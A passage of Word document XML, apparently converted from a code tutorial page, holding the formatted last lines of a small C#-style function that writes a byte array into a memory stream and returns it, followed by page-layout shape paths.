      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="dc4867"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Write</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ba</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="24"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>length</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="129" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>21</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="17"/>
        </w:rPr>
        <w:t>   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ms</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Position</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="23"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="23"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="114" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>22</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="16"/>
        </w:rPr>
        <w:t>   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ms</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="129" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>23</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:sectPr>
          <w:type w:val="continuous"/>
          <w:pgSz w:w="11920" w:h="16840"/>
          <w:pgMar w:header="0" w:footer="0" w:top="0" w:bottom="0" w:left="0" w:right="0"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:pict>
      <v:group style="position:absolute;margin-left:520.111pt;margin-top:0.0pt;width:0.0pt;height:842.0pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10402,0" coordsize="0,16840">
        <v:shape style="position:absolute;left:10402;top:0;width:0;height:16840" coordorigin="10402,0" coordsize="0,16840" path="m10402,0l10402,0,10402,0,10402,0,10402,0,10402,0,10402,1,10402,2,10402,3,10402,5,10402,7,10402,9,10402,13,10402,17,10402,21,10402,27,10402,33,10402,40,10402,49,10402,58,10402,68,10402,79,10402,92,10402,106,10402,121,10402,138,10402,156,10402,175,10402,196,10402,219,10402,243,10402,269,10402,297,10402,327,10402,359,10402,392,10402,428,10402,466,10402,506,10402,548,10402,592,10402,639,10402,688,10402,740,10402,794,10402,851,10402,910,10402,972,10402,1037,10402,1105,10402,1175,10402,1249,10402,1325,10402,1405,10402,1487,10402,1573,10402,1662,10402,1754,10402,1850,10402,1949,10402,2052,10402,2158,10402,2268,10402,2381,10402,2498,10402,2619,10402,2744,10402,2872,10402,3005,10402,3142,10402,3282,10402,3427,10402,3576,10402,3729,10402,3887,10402,4049,10402,4215,10402,4386,10402,4562,10402,4742,10402,4927,10402,5116,10402,5310,10402,5509,10402,5713,10402,5922,10402,6137,10402,6356,10402,6580,10402,6810,10402,7044,10402,7284,10402,7530,10402,7781,10402,8038,10402,8300,10402,8567,10402,8841,10402,9120,10402,9405,10402,9696,10402,9993,10402,10295,10402,10604,10402,10919,10402,11240,10402,11568,10402,11901,10402,12242,10402,12588,10402,12941,10402,13300,10402,13666,10402,14039,10402,14419,10402,14805,10402,15198,10402,15598,10402,16005,10402,16419,10402,16840e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:48.500pt;width:449.500pt;height:18.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,970" coordsize="8990,370">
        <v:shape style="position:absolute;left:1490;top:970;width:8990;height:370" coordorigin="1490,970" coordsize="8990,370" path="m1510,999l1510,999,1510,999,1510,999,1510,999,1510,999,1510,999,1511,999,1512,999,1512,999,1514,999,1515,999,1517,999,1519,999,1521,999,1524,999,1528,999,1532,999,1536,999,1541,999,1546,999,1552,999,1559,999,1566,999,1575,999,1583,999,1593,999,1603,999,1615,999,1627,999,1640,999,1654,999,1668,999,1684,999,1701,999,1719,999,1738,999,1758,999,1780,999,1802,999,1826,999,1851,999,1877,999,1904,999,1933,999,1963,999,1995,999,2028,999,2063,999,2099,999,2136,999,2175,999,2216,999,2259,999,2303,999,2348,999,2396,999,2445,999,2496,999,2549,999,2604,999,2660,999,2719,999,2779,999,2841,999,2906,999,2972,999,3041,999,3112,999,3184,999,3259,999,3336,999,3416,999,3498,999,3582,999,3668,999,3757,999,3848,999,3941,999,4037,999,4136,999,4236,999,4340,999,4446,999,4555,999,4666,999,4780,999,4897,999,5017,999,5139,999,5264,999,5392,999,5523,999,5657,999,5793,999,5933,999,6076,999,6222,999,6370,999,6522,999,6677,999,6835,999,6997,999,7161,999,7329,999,7500,999,7675,999,7853,999,8034,999,8219,999,8407,999,8598,999,8793,999,8992,999,9194,999,9400,999,9609,999,9823,999,10039,999,10260,999,10484,999,10484,999,10484,999,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1001,10484,1001,10484,1001,10484,1001,10484,1001,10484,1002,10484,1002,10484,1002,10484,1003,10484,1003,10484,1004,10484,1004,10484,1004,10484,1005,10484,1006,10484,1006,10484,1007,10484,1008,10484,1008,10484,1009,10484,1010,10484,1011,10484,1012,10484,1013,10484,1014,10484,1015,10484,1016,10484,1017,10484,1018,10484,1019,10484,1021,10484,1022,10484,1024,10484,1025,10484,1027,10484,1028,10484,1030,10484,1032,10484,1034,10484,1035,10484,1037,10484,1039,10484,1042,10484,1044,10484,1046,10484,1048,10484,1051,10484,1053,10484,1056,10484,1058,10484,1061,10484,1064,10484,1067,10484,1070,10484,1073,10484,1076,10484,1079,10484,1083,10484,1086,10484,1089,10484,1093,10484,1097,10484,1100,10484,1104,10484,1108,10484,1112,10484,1117,10484,1121,10484,1125,10484,1130,10484,1134,10484,1139,10484,1144,10484,1149,10484,1154,10484,1159,10484,1164,10484,1170,10484,1175,10484,1181,10484,1186,10484,1192,10484,1198,10484,1204,10484,1211,10484,1217,10484,1223,10484,1230,10484,1237,10484,1243,10484,1250,10484,1258,10484,1265,10484,1272,10484,1280,10484,1287,10484,1295,10484,1303,10484,1311,10484,1319,10484,1328,10484,1336,10484,1345,10484,1345,10484,1345,10484,1345,10484,1345,10484,1345,10484,1345,10483,1345,10482,1345,10482,1345,10480,1345,10479,1345,10477,1345,10475,1345,10473,1345,10470,1345,10466,1345,10462,1345,10458,1345,10453,1345,10448,1345,10442,1345,10435,1345,10428,1345,10419,1345,10411,1345,10401,1345,10391,1345,10379,1345,10367,1345,10354,1345,10340,1345,10326,1345,10310,1345,10293,1345,10275,1345,10256,1345,10236,1345,10215,1345,10192,1345,10168,1345,10143,1345,10117,1345,10090,1345,10061,1345,10031,1345,9999,1345,9966,1345,9931,1345,9895,1345,9858,1345,9819,1345,9778,1345,9735,1345,9691,1345,9646,1345,9598,1345,9549,1345,9498,1345,9445,1345,9391,1345,9334,1345,9275,1345,9215,1345,9153,1345,9088,1345,9022,1345,8953,1345,8883,1345,8810,1345,8735,1345,8658,1345,8578,1345,8497,1345,8413,1345,8326,1345,8238,1345,8146,1345,8053,1345,7957,1345,7859,1345,7758,1345,7654,1345,7548,1345,7439,1345,7328,1345,7214,1345,7097,1345,6977,1345,6855,1345,6730,1345,6602,1345,6471,1345,6337,1345,6201,1345,6061,1345,5918,1345,5773,1345,5624,1345,5472,1345,5317,1345,5159,1345,4997,1345,4833,1345,4665,1345,4494,1345,4319,1345,4141,1345,3960,1345,3776,1345,3587,1345,3396,1345,3201,1345,3002,1345,2800,1345,2594,1345,2385,1345,2172,1345,1955,1345,1734,1345,1510,1345,1510,1345,1510,1345,1510,1345,1510,1345,1510,1345,1510,1345,1510,1345,1510,1345,1510,1345,1510,1345,1510,1344,1510,1344,1510,1344,1510,1344,1510,1344,1510,1344,1510,1344,1510,1344,1510,1343,1510,1343,1510,1343,1510,1343,1510,1342,1510,1342,1510,1342,1510,1341,1510,1341,1510,1341,1510,1340,1510,1340,1510,1339,1510,1339,1510,1338,1510,1337,1510,1337,1510,1336,1510,1335,1510,1334,1510,1333,1510,1333,1510,1332,1510,1331,1510,1329,1510,1328,1510,1327,1510,1326,1510,1325,1510,1323,1510,1322,1510,1321,1510,1319,1510,1318,1510,1316,1510,1314,1510,1312,1510,1311,1510,1309,1510,1307,1510,1305,1510,1303,1510,1300,1510,1298,1510,1296,1510,1293,1510,1291,1510,1288,1510,1286,1510,1283,1510,1280,1510,1277,1510,1274,1510,1271,1510,1268,1510,1265,1510,1262,1510,1258,1510,1255,1510,1251,1510,1247,1510,1244,1510,1240,1510,1236,1510,1232,1510,1228,1510,1223,1510,1219,1510,1214,1510,1210,1510,1205,1510,1200,1510,1195,1510,1190,1510,1185,1510,1180,1510,1175,1510,1169,1510,1163,1510,1158,1510,1152,1510,1146,1510,1140,1510,1134,1510,1127,1510,1121,1510,1114,1510,1108,1510,1101,1510,1094,1510,1087,1510,1079,1510,1072,1510,1065,1510,1057,1510,1049,1510,1041,1510,1033,1510,1025,1510,1017,1510,1008,1510,999e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:49.500pt;width:1.500pt;height:17.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,990" coordsize="30,350">
        <v:shape style="position:absolute;left:1490;top:990;width:30;height:350" coordorigin="1490,990" coordsize="30,350" path="m1517,999l1517,999,1517,999,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1001,1517,1001,1517,1001,1517,1001,1517,1001,1517,1002,1517,1002,1517,1002,1517,1003,1517,1003,1517,1004,1517,1004,1517,1004,1517,1005,1517,1006,1517,1006,1517,1007,1517,1008,1517,1008,1517,1009,1517,1010,1517,1011,1517,1012,1517,1013,1517,1014,1517,1015,1517,1016,1517,1017,1517,1018,1517,1019,1517,1021,1517,1022,1517,1024,1517,1025,1517,1027,1517,1028,1517,1030,1517,1032,1517,1034,1517,1035,1517,1037,1517,1039,1517,1042,1517,1044,1517,1046,1517,1048,1517,1051,1517,1053,1517,1056,1517,1058,1517,1061,1517,1064,1517,1067,1517,1070,1517,1073,1517,1076,1517,1079,1517,1083,1517,1086,1517,1089,1517,1093,1517,1097,1517,1100,1517,1104,1517,1108,1517,1112,1517,1117,1517,1121,1517,1125,1517,1130,1517,1134,1517,1139,1517,1144,1517,1149,1517,1154,1517,1159,1517,1164,1517,1170,1517,1175,1517,1181,1517,1186,1517,1192,1517,1198,1517,1204,1517,1211,1517,1217,1517,1223,1517,1230,1517,1237,1517,1243,1517,1250,1517,1258,1517,1265,1517,1272,1517,1280,1517,1287,1517,1295,1517,1303,1517,1311,1517,1319,1517,1328,1517,1336,1517,1345e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:66.500pt;width:449.500pt;height:31.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1330" coordsize="8990,630">
        <v:shape style="position:absolute;left:1490;top:1330;width:8990;height:630" coordorigin="1490,1330" coordsize="8990,630" path="m1510,1345l1510,1345,1510,1345,1510,1345,1510,1345,1510,1345,1510,1345,1511,1345,1512,1345,1512,1345,1514,1345,1515,1345,1517,1345,1519,1345,1521,1345,1524,1345,1528,1345,1532,1345,1536,1345,1541,1345,1546,1345,1552,1345,1559,1345,1566,1345,1575,1345,1583,1345,1593,1345,1603,1345,1615,1345,1627,1345,1640,1345,1654,1345,1668,1345,1684,1345,1701,1345,1719,1345,1738,1345,1758,1345,1780,1345,1802,1345,1826,1345,1851,1345,1877,1345,1904,1345,1933,1345,1963,1345,1995,1345,2028,1345,2063,1345,2099,1345,2136,1345,2175,1345,2216,1345,2259,1345,2303,1345,2348,1345,2396,1345,2445,1345,2496,1345,2549,1345,2604,1345,2660,1345,2719,1345,2779,1345,2841,1345,2906,1345,2972,1345,3041,1345,3112,1345,3184,1345,3259,1345,3336,1345,3416,1345,3498,1345,3582,1345,3668,1345,3757,1345,3848,1345,3941,1345,4037,1345,4136,1345,4236,1345,4340,1345,4446,1345,4555,1345,4666,1345,4780,1345,4897,1345,5017,1345,5139,1345,5264,1345,5392,1345,5523,1345,5657,1345,5793,1345,5933,1345,6076,1345,6222,1345,6370,1345,6522,1345,6677,1345,6835,1345,6997,1345,7161,1345,7329,1345,7500,1345,7675,1345,7853,1345,8034,1345,8219,1345,8407,1345,8598,1345,8793,1345,8992,1345,9194,1345,9400,1345,9609,1345,9823,1345,10039,1345,10260,1345,10484,1345,10484,1345,10484,1345,10484,1345,10484,1345,10484,1345,10484,1345,10484,1345,10484,1345,10484,1345,10484,1345,10484,1345,10484,1345,10484,1345,10484,1345,10484,1346,10484,1346,10484,1346,10484,1347,10484,1347,10484,1347,10484,1348,10484,1348,10484,1349,10484,1349,10484,1350,10484,1351,10484,1351,10484,1352,10484,1353,10484,1354,10484,1355,10484,1356,10484,1357,10484,1358,10484,1359,10484,1361,10484,1362,10484,1364,10484,1365,10484,1367,10484,1369,10484,1370,10484,1372,10484,1374,10484,1377,10484,1379,10484,1381,10484,1384,10484,1386,10484,1389,10484,1391,10484,1394,10484,1397,10484,1400,10484,1404,10484,1407,10484,1410,10484,1414,10484,1418,10484,1421,10484,1425,10484,1430,10484,1434,10484,1438,10484,1443,10484,1447,10484,1452,10484,1457,10484,1462,10484,1468,10484,1473,10484,1479,10484,1484,10484,1490,10484,1496,10484,1502,10484,1509,10484,1515,10484,1522,10484,1529,10484,1536,10484,1543,10484,1551,10484,1559,10484,1566,10484,1574,10484,1583,10484,1591,10484,1600,10484,1608,10484,1617,10484,1627,10484,1636,10484,1646,10484,1655,10484,1665,10484,1676,10484,1686,10484,1697,10484,1708,10484,1719,10484,1730,10484,1742,10484,1753,10484,1765,10484,1778,10484,1790,10484,1803,10484,1816,10484,1829,10484,1843,10484,1856,10484,1870,10484,1884,10484,1899,10484,1914,10484,1929,10484,1944,10484,1959,10484,1975,10484,1975,10484,1975,10484,1975,10484,1975,10484,1975,10484,1975,10483,1975,10482,1975,10482,1975,10480,1975,10479,1975,10477,1975,10475,1975,10473,1975,10470,1975,10466,1975,10462,1975,10458,1975,10453,1975,10448,1975,10442,1975,10435,1975,10428,1975,10419,1975,10411,1975,10401,1975,10391,1975,10379,1975,10367,1975,10354,1975,10340,1975,10326,1975,10310,1975,10293,1975,10275,1975,10256,1975,10236,1975,10215,1975,10192,1975,10168,1975,10143,1975,10117,1975,10090,1975,10061,1975,10031,1975,9999,1975,9966,1975,9931,1975,9895,1975,9858,1975,9819,1975,9778,1975,9735,1975,9691,1975,9646,1975,9598,1975,9549,1975,9498,1975,9445,1975,9391,1975,9334,1975,9275,1975,9215,1975,9153,1975,9088,1975,9022,1975,8953,1975,8883,1975,8810,1975,8735,1975,8658,1975,8578,1975,8497,1975,8413,1975,8326,1975,8238,1975,8146,1975,8053,1975,7957,1975,7859,1975,7758,1975,7654,1975,7548,1975,7439,1975,7328,1975,7214,1975,7097,1975,6977,1975,6855,1975,6730,1975,6602,1975,6471,1975,6337,1975,6201,1975,6061,1975,5918,1975,5773,1975,5624,1975,5472,1975,5317,1975,5159,1975,4997,1975,4833,1975,4665,1975,4494,1975,4319,1975,4141,1975,3960,1975,3776,1975,3587,1975,3396,1975,3201,1975,3002,1975,2800,1975,2594,1975,2385,1975,2172,1975,1955,1975,1734,1975,1510,1975,1510,1975,1510,1975,1510,1975,1510,1975,1510,1975,1510,1975,1510,1975,1510,1975,1510,1975,1510,1975,1510,1975,1510,1974,1510,1974,1510,1974,1510,1974,1510,1974,1510,1973,1510,1973,1510,1973,1510,1972,1510,1972,1510,1972,1510,1971,1510,1970,1510,1970,1510,1969,1510,1968,1510,1968,1510,1967,1510,1966,1510,1965,1510,1964,1510,1963,1510,1962,1510,1960,1510,1959,1510,1958,1510,1956,1510,1954,1510,1953,1510,1951,1510,1949,1510,1947,1510,1945,1510,1943,1510,1941,1510,1939,1510,1936,1510,1934,1510,1931,1510,1928,1510,1925,1510,1922,1510,1919,1510,1916,1510,1913,1510,1909,1510,1906,1510,1902,1510,1898,1510,1894,1510,1890,1510,1886,1510,1881,1510,1877,1510,1872,1510,1867,1510,1862,1510,1857,1510,1852,1510,1847,1510,1841,1510,1835,1510,1829,1510,1823,1510,1817,1510,1811,1510,1804,1510,1797,1510,1791,1510,1783,1510,1776,1510,1769,1510,1761,1510,1753,1510,1745,1510,1737,1510,1729,1510,1720,1510,1711,1510,1702,1510,1693,1510,1684,1510,1674,1510,1664,1510,1654,1510,1644,1510,1634,1510,1623,1510,1612,1510,1601,1510,1590,1510,1578,1510,1566,1510,1554,1510,1542,1510,1530,1510,1517,1510,1504,1510,1491,1510,1477,1510,1463,1510,1449,1510,1435,1510,1421,1510,1406,1510,1391,1510,1376,1510,1360,1510,1345e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:66.500pt;width:1.500pt;height:32.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1330" coordsize="30,650">
